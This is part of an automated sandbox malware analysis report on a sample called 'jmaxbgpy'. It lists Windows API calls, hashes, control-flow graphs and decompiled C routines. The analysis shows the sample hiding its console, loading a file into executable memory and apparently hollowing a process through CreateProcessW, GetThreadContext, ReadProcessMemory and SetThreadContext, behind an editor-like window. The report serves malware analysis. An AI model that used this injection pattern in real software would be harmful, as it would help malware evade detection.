                                                                    0x00401528
                                                                    0x00401458
                                                                    0x00401428
                                                                    0x00401428
                                                                    0x0040152c
                                                                    0x00401532
                                                                    0x00401532
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401335
                                                                    0x00401335
                                                                    0x0040133b
                                                                    0x00401341
                                                                    0x00401344
                                                                    0x00401351
                                                                    0x00401353
                                                                    0x00401354
                                                                    0x00000000

                                                                    APIs
                                                                    • GetConsoleWindow.KERNELBASE(00000000), ref: 004012D0
                                                                    • ShowWindow.USER32(00000000), ref: 004012D7
                                                                      • Part of subcall function 00401716: __fsopen.LIBCMT ref: 00401723
                                                                    • _fseek.LIBCMT ref: 004012F3
                                                                    • _fseek.LIBCMT ref: 00401307
                                                                      • Part of subcall function 00401C17: __lock_file.LIBCMT ref: 00401C58
                                                                      • Part of subcall function 00401C17: __fseek_nolock.LIBCMT ref: 00401C69
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401318
                                                                    • __fread_nolock.LIBCMT ref: 00401327
                                                                    • #17.COMCTL32 ref: 00401358
                                                                    • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 00401367
                                                                    • _memset.LIBCMT ref: 0040137E
                                                                    • LoadIconW.USER32 ref: 004013B3
                                                                    • GetSystemMetrics.USER32 ref: 004013CA
                                                                    • GetSystemMetrics.USER32 ref: 004013CF
                                                                    • LoadImageW.USER32 ref: 004013DD
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004013F0
                                                                    • RegisterClassExW.USER32 ref: 0040141D
                                                                    • MonitorFromRect.USER32(0040EDAC,00000001), ref: 00401435
                                                                    • GetMonitorInfoW.USER32 ref: 00401449
                                                                    • ExitProcess.KERNEL32 ref: 00401458
                                                                      • Part of subcall function 00401000: GetWindowTextLengthW.USER32(00000001), ref: 00401007
                                                                      • Part of subcall function 00401000: SendMessageW.USER32(000000B8,00000000,00000000), ref: 0040101E
                                                                    • SetWindowTextW.USER32(0040BB5C), ref: 00401472
                                                                    • SendMessageW.USER32(000000CD,00000000,00000000), ref: 00401485
                                                                    • SetFocus.USER32(?,?,?,?,?,?,?), ref: 00401491
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,?), ref: 0040149E
                                                                    • UpdateWindow.USER32 ref: 004014AA
                                                                    • DragAcceptFiles.SHELL32(00000001), ref: 004014B7
                                                                    • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 004014BD
                                                                    • LoadAcceleratorsW.USER32 ref: 004014C9
                                                                    • IsDialogMessageW.USER32(?), ref: 004014E4
                                                                    • TranslateAcceleratorW.USER32(00000000,?), ref: 004014FA
                                                                    • TranslateMessage.USER32(?), ref: 00401509
                                                                    • DispatchMessageW.USER32 ref: 00401514
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401522
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: MessageWindow$Load$MetricsMonitorRegisterSendShowSystemTextTranslate_fseek$AcceleratorAcceleratorsAcceptAllocClassCommandConsoleCursorDialogDispatchDragExitFilesFocusFromIconImageInfoLengthLineProcessRectUpdateVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_memset
                                                                    • String ID: ($commdlg_FindReplace
                                                                    • API String ID: 769504788-4049073185
                                                                    • Opcode ID: 1220983b491c537299979994e6134945ef6804f7a0964bd72be5ba160fb07e17
                                                                    • Instruction ID: 688ccc469aee0ef2568696946fd1be1d4341ec0720bce4c4433f27de2b556ddf
                                                                    • Opcode Fuzzy Hash: 1220983b491c537299979994e6134945ef6804f7a0964bd72be5ba160fb07e17
                                                                    • Instruction Fuzzy Hash: 34519B72504301AFE710AFA1EE49E5B7BACEB89754F00043EF645F62B1DB758814CB6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,008A154D,7FAB7E30), ref: 008A0D7D
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,008A154D,7FAB7E30,008A120B,00000000,00000040), ref: 008A0DA7
                                                                    • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,008A154D,7FAB7E30,008A120B,00000000), ref: 008A0DBE
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,008A154D,7FAB7E30,008A120B,00000000,00000040), ref: 008A0DE0
                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,008A154D,7FAB7E30,008A120B,00000000,00000040,?,00000000,0000000E), ref: 008A0E52
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,008A154D,7FAB7E30,008A120B,00000000,00000040,?), ref: 008A0E5D
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,008A154D,7FAB7E30,008A120B,00000000,00000040,?), ref: 008A0EA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                    • String ID:
                                                                    • API String ID: 656311269-0
                                                                    • Opcode ID: 661c0533ad7b29d07a2e89b0b0c68f880fba5bbdb2bd41038e576d7b631b3303
                                                                    • Instruction ID: 66b071f8bbb06defbb5dbed469c40d003d8d17e7f19fe2d3474cc3c1345c2506
                                                                    • Opcode Fuzzy Hash: 661c0533ad7b29d07a2e89b0b0c68f880fba5bbdb2bd41038e576d7b631b3303
                                                                    • Instruction Fuzzy Hash: DA518C71E00618ABEB209FB8DC85BAEB7B8FF0A710F104915F940F7681E7749A119B65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 84 8a020a-8a0225 call 8a005f 87 8a0228-8a022c 84->87 88 8a022e-8a0242 87->88 89 8a0244-8a0251 87->89 88->87 90 8a0254-8a0258 89->90 91 8a025a-8a026e 90->91 92 8a0270-8a027d 90->92 91->90 93 8a0280-8a0284 92->93 94 8a029c-8a037a call 8a0073 * 8 93->94 95 8a0286-8a029a 93->95 112 8a037c-8a0386 94->112 113 8a0391 94->113 95->93 112->113 114 8a0388-8a038f 112->114 115 8a0395-8a03b1 113->115 114->115 117 8a03ba 115->117 118 8a03b3-8a03b5 115->118 120 8a03c1-8a03e9 CreateProcessW 117->120 119 8a0734-8a0737 118->119 121 8a03eb 120->121 122 8a03f0-8a0409 GetThreadContext 120->122 123 8a06e8-8a06ec 121->123 124 8a040b 122->124 125 8a0410-8a042d ReadProcessMemory 122->125 126 8a06ee-8a06f2 123->126 127 8a0731-8a0733 123->127 124->123 128 8a042f 125->128 129 8a0434-8a043d 125->129 130 8a06f4-8a06ff 126->130 131 8a0705-8a0709 126->131 127->119 128->123 132 8a043f-8a044e 129->132 133 8a0464-8a0483 call 8a10fd 129->133 130->131 136 8a070b 131->136 137 8a0711-8a0715 131->137 132->133 134 8a0450-8a0456 call 8a1068 132->134 144 8a048a-8a04ab call 8a1217 133->144 145 8a0485 133->145 143 8a045b-8a045d 134->143 136->137 141 8a071d-8a0721 137->141 142 8a0717 137->142 146 8a072d-8a072f 141->146 147 8a0723-8a0728 call 8a1068 141->147 142->141 143->133 148 8a045f 143->148 152 8a04ad-8a04b4 144->152 153 8a04f0-8a0510 call 8a1217 144->153 145->123 146->119 147->146 148->123 155 8a04eb 152->155 156 8a04b6-8a04e2 call 8a1217 152->156 159 8a0512 153->159 160 8a0517-8a052c call 8a00da 153->160 155->123 163 8a04e9 156->163 164 8a04e4 156->164 159->123 166 8a0535-8a053f 160->166 163->153 164->123 167 8a0571-8a0575 166->167 168 8a0541-8a056f call 8a00da 166->168 170 8a057b-8a0589 167->170 171 8a0655-8a0671 call 8a0eb6 167->171 168->166 170->171 172 8a058f-8a059d 170->172 179 8a0673 171->179 180 8a0675-8a0696 SetThreadContext 171->180 172->171 175 8a05a3-8a05c3 172->175 178 8a05c6-8a05ca 175->178 178->171 181 8a05d0-8a05e5 178->181 179->123 182 8a069a-8a06a4 call 8a0fb7 180->182 183 8a0698 180->183 185 8a05f7-8a05fb 181->185 189 8a06a8-8a06ac 182->189 190 8a06a6 182->190 183->123 187 8a0638-8a0650 185->187 188 8a05fd-8a0609 185->188 187->178 191 8a060b-8a0634 188->191 192 8a0636 188->192 193 8a06ae 189->193 194 8a06b4-8a06b8 189->194 190->123 191->192 192->185 193->194 196 8a06ba 194->196 197 8a06c0-8a06c4 194->197 196->197 198 8a06cc-8a06d0 197->198 199 8a06c6 197->199 200 8a06dc-8a06e2 198->200 201 8a06d2-8a06d7 call 8a1068 198->201 199->198 200->120 200->123 201->200
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D
                                                                    • API String ID: 0-2746444292
                                                                    • Opcode ID: 6953ee601dfed12ab04a5de663bf10c79f65c5631977d8463f2331f7abacd3ea
                                                                    • Instruction ID: 3e329169d0e726f99d0e60628c55ef1388276d671118e51f4ce46e39a6d2dc5d
                                                                    • Opcode Fuzzy Hash: 6953ee601dfed12ab04a5de663bf10c79f65c5631977d8463f2331f7abacd3ea
                                                                    • Instruction Fuzzy Hash: 6D02EE70E00208EFEF10CB98C985BADBBB5FF09309F204069E515FA6A1D774AA94DF15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 203 40172d-401749 204 401765 203->204 205 40174b-40174f 203->205 207 401767-40176b 204->207 205->204 206 401751-401753 205->206 208 401755-40175a call 402fac 206->208 209 40176c-401771 206->209 219 401760 call 401fb1 208->219 211 401773-40177d 209->211 212 40177f-401782 209->212 211->212 214 4017a0-4017b0 211->214 215 401790-401792 212->215 216 401784-40178d call 403bb0 212->216 217 4017b2-4017b8 214->217 218 4017ba 214->218 215->208 221 401794-40179e 215->221 216->215 222 4017c1-4017c3 217->222 218->222 219->204 221->208 221->214 225 4018a3-4018a6 222->225 226 4017c9-4017d0 222->226 225->207 227 4017d2-4017d7 226->227 228 401816-401819 226->228 227->228 229 4017d9 227->229 230 401877-401878 call 403342 228->230 231 40181b-40181f 228->231 232 4018d1 229->232 233 4017df-4017e3 229->233 244 40187d-401881 230->244 235 401840-401847 231->235 236 401821-40182a 231->236 243 4018d5-4018de 232->243 241 4017e5 233->241 242 4017e7-4017ea 233->242 239 401849 235->239 240 40184b-40184e 235->240 237 401835-40183a 236->237 238 40182c-401833 236->238 246 40183c-40183e 237->246 238->246 239->240 247 401850-40185c call 403b11 call 403a1b 240->247 248 4018ab-4018af 240->248 241->242 242->248 249 4017f0-401811 call 403b37 242->249 243->207 244->243 245 401883-401887 244->245 245->248 250 401889-401898 245->250 246->240 263 401861-401866 247->263 251 4018c1-4018cc call 402fac 248->251 252 4018b1-4018be call 403bb0 248->252 255 40189b-40189d 249->255 250->255 251->219 252->251 255->225 255->226 264 4018e3-4018e7 263->264 265 401868-40186b 263->265 264->243 265->232 266 40186d-401875 265->266 266->255
                                                                    C-Code - Quality: 97%
                                                                    			E0040172D(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                    				signed int _v8;
                                                                    				char* _v12;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t82;
                                                                    				signed int _t86;
                                                                    				char _t89;
                                                                    				signed int _t96;
                                                                    				signed int _t98;
                                                                    				signed int _t101;
                                                                    				signed int _t104;
                                                                    				signed int _t107;
                                                                    				signed int _t108;
                                                                    				signed int _t109;
                                                                    				char* _t110;
                                                                    				signed int _t116;
                                                                    				signed int _t121;
                                                                    				signed int _t122;
                                                                    				signed int _t123;
                                                                    				signed int _t124;
                                                                    				void* _t125;
                                                                    
                                                                    				_t110 = _a4;
                                                                    				_t108 = _a8;
                                                                    				_t121 = _a12;
                                                                    				_v12 = _t110;
                                                                    				_v8 = _t108;
                                                                    				if(_t121 == 0 || _a16 == 0) {
                                                                    					L5:
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t129 = _t110;
                                                                    					if(_t110 != 0) {
                                                                    						_t124 = _a20;
                                                                    						__eflags = _t124;
                                                                    						if(_t124 == 0) {
                                                                    							L9:
                                                                    							__eflags = _t108 - 0xffffffff;
                                                                    							if(_t108 != 0xffffffff) {
                                                                    								_t82 = E00403BB0(_t110, 0, _t108);
                                                                    								_t125 = _t125 + 0xc;
                                                                    							}
                                                                    							__eflags = _t124;
                                                                    							if(__eflags == 0) {
                                                                    								goto L3;
                                                                    							} else {
                                                                    								_t86 = _t82 | 0xffffffff;
                                                                    								_t116 = _t86 % _t121;
                                                                    								__eflags = _a16 - _t86 / _t121;
                                                                    								if(__eflags > 0) {
                                                                    									goto L3;
                                                                    								}
                                                                    								L13:
                                                                    								_t122 = _t121 * _a16;
                                                                    								__eflags =  *(_t124 + 0xc) & 0x0000010c;
                                                                    								_v20 = _t122;
                                                                    								_t109 = _t122;
                                                                    								if(( *(_t124 + 0xc) & 0x0000010c) == 0) {
                                                                    									_v16 = 0x1000;
                                                                    								} else {
                                                                    									_v16 =  *((intOrPtr*)(_t124 + 0x18));
                                                                    								}
                                                                    								__eflags = _t122;
                                                                    								if(_t122 == 0) {
                                                                    									L40:
                                                                    									return _a16;
                                                                    								} else {
                                                                    									do {
                                                                    										__eflags =  *(_t124 + 0xc) & 0x0000010c;
                                                                    										if(( *(_t124 + 0xc) & 0x0000010c) == 0) {
                                                                    											L24:
                                                                    											__eflags = _t109 - _v16;
                                                                    											if(_t109 < _v16) {
                                                                    												_t89 = E00403342(_t109, _t122, _t124); // executed
                                                                    												__eflags = _t89 - 0xffffffff;
                                                                    												if(_t89 == 0xffffffff) {
                                                                    													L45:
                                                                    													return (_t122 - _t109) / _a12;
                                                                    												}
                                                                    												__eflags = _v8;
                                                                    												if(_v8 == 0) {
                                                                    													L41:
                                                                    													__eflags = _a8 - 0xffffffff;
                                                                    													if(__eflags != 0) {
                                                                    														E00403BB0(_a4, 0, _a8);
                                                                    													}
                                                                    													 *((intOrPtr*)(E00402FAC(__eflags))) = 0x22;
                                                                    													L4:
                                                                    													E00401FB1();
                                                                    													goto L5;
                                                                    												}
                                                                    												_v12 = _v12 + 1;
                                                                    												 *_v12 = _t89;
                                                                    												_t109 = _t109 - 1;
                                                                    												_t65 =  &_v8;
                                                                    												 *_t65 = _v8 - 1;
                                                                    												__eflags =  *_t65;
                                                                    												_v16 =  *((intOrPtr*)(_t124 + 0x18));
                                                                    												goto L39;
                                                                    											}
                                                                    											__eflags = _v16;
                                                                    											if(_v16 == 0) {
                                                                    												_t96 = 0x7fffffff;
                                                                    												__eflags = _t109 - 0x7fffffff;
                                                                    												if(_t109 <= 0x7fffffff) {
                                                                    													_t96 = _t109;
                                                                    												}
                                                                    											} else {
                                                                    												__eflags = _t109 - 0x7fffffff;
                                                                    												if(_t109 <= 0x7fffffff) {
                                                                    													_t50 = _t109 % _v16;
                                                                    													__eflags = _t50;
                                                                    													_t116 = _t50;
                                                                    													_t101 = _t109;
                                                                    												} else {
                                                                    													_t116 = 0x7fffffff % _v16;
                                                                    													_t101 = 0x7fffffff;
                                                                    												}
                                                                    												_t96 = _t101 - _t116;
                                                                    											}
                                                                    											__eflags = _t96 - _v8;
                                                                    											if(_t96 > _v8) {
                                                                    												goto L41;
                                                                    											} else {
                                                                    												_push(_t96);
                                                                    												_push(_v12);
                                                                    												_push(E00403B11(_t124)); // executed
                                                                    												_t98 = E00403A1B(_t109, _t116, _t122, _t124, __eflags); // executed
                                                                    												_t125 = _t125 + 0xc;
                                                                    												__eflags = _t98;
                                                                    												if(_t98 == 0) {
                                                                    													 *(_t124 + 0xc) =  *(_t124 + 0xc) | 0x00000010;
                                                                    													goto L45;
                                                                    												}
                                                                    												__eflags = _t98 - 0xffffffff;
                                                                    												if(_t98 == 0xffffffff) {
                                                                    													L44:
                                                                    													_t72 = _t124 + 0xc;
                                                                    													 *_t72 =  *(_t124 + 0xc) | 0x00000020;
                                                                    													__eflags =  *_t72;
                                                                    													goto L45;
                                                                    												}
                                                                    												_v12 = _v12 + _t98;
                                                                    												_t109 = _t109 - _t98;
                                                                    												_v8 = _v8 - _t98;
                                                                    												goto L39;
                                                                    											}
                                                                    										}
                                                                    										_t104 =  *(_t124 + 4);
                                                                    										__eflags = _t104;
                                                                    										if(__eflags == 0) {
                                                                    											goto L24;
                                                                    										}
                                                                    										if(__eflags < 0) {
                                                                    											goto L44;
                                                                    										}
                                                                    										_t123 = _t109;
                                                                    										__eflags = _t109 - _t104;
                                                                    										if(_t109 >= _t104) {
                                                                    											_t123 = _t104;
                                                                    										}
                                                                    										__eflags = _t123 - _v8;
                                                                    										if(_t123 > _v8) {
                                                                    											goto L41;
                                                                    										} else {
                                                                    											E00403B37(_v12, _v8,  *_t124, _t123);
                                                                    											 *(_t124 + 4) =  *(_t124 + 4) - _t123;
                                                                    											 *_t124 =  *_t124 + _t123;
                                                                    											_v12 = _v12 + _t123;
                                                                    											_t109 = _t109 - _t123;
                                                                    											_t125 = _t125 + 0x10;
                                                                    											_v8 = _v8 - _t123;
                                                                    											_t122 = _v20;
                                                                    										}
                                                                    										L39:
                                                                    										__eflags = _t109;
                                                                    									} while (_t109 != 0);
                                                                    									goto L40;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_t107 = _t82 | 0xffffffff;
                                                                    						_t82 = _t107 / _t121;
                                                                    						_t116 = _t107 % _t121;
                                                                    						__eflags = _a16 - _t82;
                                                                    						if(_a16 <= _t82) {
                                                                    							goto L13;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    					L3:
                                                                    					 *((intOrPtr*)(E00402FAC(_t129))) = 0x16;
                                                                    					goto L4;
                                                                    				}
                                                                    			}




























                                                                    0x00401735
                                                                    0x00401739
                                                                    0x0040173e
                                                                    0x00401741
                                                                    0x00401744
                                                                    0x00401749
                                                                    0x00401765
                                                                    0x00000000
                                                                    0x00401751
                                                                    0x00401751
                                                                    0x00401753
                                                                    0x0040176c
                                                                    0x0040176f
                                                                    0x00401771
                                                                    0x0040177f
                                                                    0x0040177f
                                                                    0x00401782
                                                                    0x00401788
                                                                    0x0040178d
                                                                    0x0040178d
                                                                    0x00401790
                                                                    0x00401792
                                                                    0x00000000
                                                                    0x00401794
                                                                    0x00401794
                                                                    0x00401799
                                                                    0x0040179b
                                                                    0x0040179e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004017a0
                                                                    0x004017a0
                                                                    0x004017a4
                                                                    0x004017ab
                                                                    0x004017ae
                                                                    0x004017b0
                                                                    0x004017ba
                                                                    0x004017b2
                                                                    0x004017b5
                                                                    0x004017b5
                                                                    0x004017c1
                                                                    0x004017c3
                                                                    0x004018a3
                                                                    0x00000000
                                                                    0x004017c9
                                                                    0x004017c9
                                                                    0x004017c9
                                                                    0x004017d0
                                                                    0x00401816
                                                                    0x00401816
                                                                    0x00401819
                                                                    0x00401878
                                                                    0x0040187e
                                                                    0x00401881
                                                                    0x004018d5
                                                                    0x00000000
                                                                    0x004018db
                                                                    0x00401883
                                                                    0x00401887
                                                                    0x004018ab
                                                                    0x004018ab
                                                                    0x004018af
                                                                    0x004018b9
                                                                    0x004018be
                                                                    0x004018c6
                                                                    0x00401760
                                                                    0x00401760
                                                                    0x00000000
                                                                    0x00401760
                                                                    0x0040188c
                                                                    0x0040188f
                                                                    0x00401894
                                                                    0x00401895
                                                                    0x00401895
                                                                    0x00401895
                                                                    0x00401898
                                                                    0x00000000
                                                                    0x00401898
                                                                    0x0040181b
                                                                    0x0040181f
                                                                    0x00401840
                                                                    0x00401845
                                                                    0x00401847
                                                                    0x00401849
                                                                    0x00401849
                                                                    0x00401821
                                                                    0x00401828
                                                                    0x0040182a
                                                                    0x00401837
                                                                    0x00401837
                                                                    0x00401837
                                                                    0x0040183a
                                                                    0x0040182c
                                                                    0x0040182e
                                                                    0x00401831
                                                                    0x00401831
                                                                    0x0040183c
                                                                    0x0040183c
                                                                    0x0040184b
                                                                    0x0040184e
                                                                    0x00000000
                                                                    0x00401850
                                                                    0x00401850
                                                                    0x00401851
                                                                    0x0040185b
                                                                    0x0040185c
                                                                    0x00401861
                                                                    0x00401864
                                                                    0x00401866
                                                                    0x004018e3
                                                                    0x00000000
                                                                    0x004018e3
                                                                    0x00401868
                                                                    0x0040186b
                                                                    0x004018d1
                                                                    0x004018d1
                                                                    0x004018d1
                                                                    0x004018d1
                                                                    0x00000000
                                                                    0x004018d1
                                                                    0x0040186d
                                                                    0x00401870
                                                                    0x00401872
                                                                    0x00000000
                                                                    0x00401872
                                                                    0x0040184e
                                                                    0x004017d2
                                                                    0x004017d5
                                                                    0x004017d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004017d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004017df
                                                                    0x004017e1
                                                                    0x004017e3
                                                                    0x004017e5
                                                                    0x004017e5
                                                                    0x004017e7
                                                                    0x004017ea
                                                                    0x00000000
                                                                    0x004017f0
                                                                    0x004017f9
                                                                    0x004017fe
                                                                    0x00401801
                                                                    0x00401803
                                                                    0x00401806
                                                                    0x00401808
                                                                    0x0040180b
                                                                    0x0040180e
                                                                    0x0040180e
                                                                    0x0040189b
                                                                    0x0040189b
                                                                    0x0040189b
                                                                    0x00000000
                                                                    0x004017c9
                                                                    0x004017c3
                                                                    0x00401792
                                                                    0x00401773
                                                                    0x00401778
                                                                    0x00401778
                                                                    0x0040177a
                                                                    0x0040177d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040177d
                                                                    0x00401755
                                                                    0x0040175a
                                                                    0x00000000
                                                                    0x0040175a

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 4048096073-0
                                                                    • Opcode ID: c834420f2201dbe164645cea011ba393cdbc0e91e4ae0d6a00eb4ef3a7a38d8e
                                                                    • Instruction ID: eb833c3633ca1413d35e357c7b03b7f1f59de7c51d7cfb478df74d0843493162
                                                                    • Opcode Fuzzy Hash: c834420f2201dbe164645cea011ba393cdbc0e91e4ae0d6a00eb4ef3a7a38d8e
                                                                    • Instruction Fuzzy Hash: 3C51D731E00304DBCB24AF79898469EB7B5AF40364F24827BE821732E1D7789F51DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 305 4018e9-4018fd call 403000 308 40192e 305->308 309 4018ff-401902 305->309 311 401930-401935 call 403045 308->311 309->308 310 401904-401907 309->310 312 401936-401951 call 402225 call 40172d 310->312 313 401909-40190d 310->313 325 401956-40196b call 40196d 312->325 316 40191e-401929 call 402fac call 401fb1 313->316 317 40190f-40191b call 403bb0 313->317 316->308 317->316 325->311
                                                                    C-Code - Quality: 88%
                                                                    			E004018E9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t19;
                                                                    				intOrPtr _t22;
                                                                    				void* _t33;
                                                                    
                                                                    				_push(0xc);
                                                                    				_push(0x40bcd0);
                                                                    				E00403000(__ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                                                    				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                                                    					L6:
                                                                    					_t19 = 0;
                                                                    				} else {
                                                                    					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                                                    						E00402225( *((intOrPtr*)(_t33 + 0x18)));
                                                                    						 *((intOrPtr*)(_t33 - 4)) = 0;
                                                                    						_t22 = E0040172D( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                                                    						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                                                    						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                                                    						E0040196D();
                                                                    						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                                                    					} else {
                                                                    						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                                                    						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                                                    							E00403BB0( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                                                    						}
                                                                    						 *((intOrPtr*)(E00402FAC(_t41))) = 0x16;
                                                                    						E00401FB1();
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    				return E00403045(_t19);
                                                                    			}






                                                                    0x004018e9
                                                                    0x004018eb
                                                                    0x004018f0
                                                                    0x004018f7
                                                                    0x004018fd
                                                                    0x0040192e
                                                                    0x0040192e
                                                                    0x00401904
                                                                    0x00401907
                                                                    0x00401939
                                                                    0x0040193f
                                                                    0x00401951
                                                                    0x00401959
                                                                    0x0040195c
                                                                    0x00401963
                                                                    0x00401968
                                                                    0x00401909
                                                                    0x00401909
                                                                    0x0040190d
                                                                    0x00401916
                                                                    0x0040191b
                                                                    0x00401923
                                                                    0x00401929
                                                                    0x00000000
                                                                    0x00401929
                                                                    0x00401907
                                                                    0x00401935

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: __lock_file_memset
                                                                    • String ID:
                                                                    • API String ID: 26237723-0
                                                                    • Opcode ID: 6aab09aaf14dade6918dd8d7749a6371246a8d5a1fe8f1208abf6e2087b082a6
                                                                    • Instruction ID: 7b6f7a1f5f86b21f1b3630097b74921145bd9a162317678c0af65d7b1db5dd42
                                                                    • Opcode Fuzzy Hash: 6aab09aaf14dade6918dd8d7749a6371246a8d5a1fe8f1208abf6e2087b082a6
                                                                    • Instruction Fuzzy Hash: 1A011EB1801209EBCF22AFA5CC1699E7F71AF04755F00817BF824351F1C7798A61EB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 86%
                                                                    			E00401B28(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t15;
                                                                    				signed int _t17;
                                                                    				void* _t26;
                                                                    				intOrPtr _t28;
                                                                    
                                                                    				_push(0xc);
                                                                    				_push(0x40bcf0);
                                                                    				E00403000(__ebx, __edi, __esi);
                                                                    				_t28 =  *((intOrPtr*)(_t26 + 8));
                                                                    				_t29 = _t28 != 0;
                                                                    				if(_t28 != 0) {
                                                                    					E00402225( *((intOrPtr*)(_t26 + 8)));
                                                                    					_t5 = _t26 - 4;
                                                                    					 *_t5 =  *(_t26 - 4) & 0x00000000;
                                                                    					__eflags =  *_t5;
                                                                    					_t15 = E00401994( *((intOrPtr*)(_t26 + 8))); // executed
                                                                    					 *(_t26 - 0x1c) = _t15;
                                                                    					 *(_t26 - 4) = 0xfffffffe;
                                                                    					E00401B83();
                                                                    					_t17 =  *(_t26 - 0x1c);
                                                                    				} else {
